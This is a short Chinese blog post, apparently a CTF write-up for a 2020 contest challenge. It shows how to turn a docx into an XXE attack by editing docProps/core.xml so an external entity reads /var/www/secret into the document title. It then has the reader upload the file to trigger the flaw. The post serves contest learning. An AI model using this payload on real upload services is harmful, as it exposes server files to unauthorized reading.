0%

2020 易林博“停课不停赛,以赛促学” XXE

发表于 更新于 分类于
本文字数: 1k 阅读时长 ≈ 1 分钟

下载模板docx文件,后缀改为zip,直接在zip下修改docProps/core.xml文件内容为

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE root[
  <!ENTITY xxe SYSTEM "/var/www/secret">
  ]>
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <dc:title>&xxe;</dc:title>
  <dc:subject></dc:subject>
  <dc:creator></dc:creator>
  <cp:keywords></cp:keywords>
  <dc:description></dc:description>
  <cp:lastModifiedBy></cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-08-01T19:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-08-01T19:01:00Z</dcterms:modified>
</cp:coreProperties>

改回docx格式上传即可触发XXE漏洞

image-20200327152415694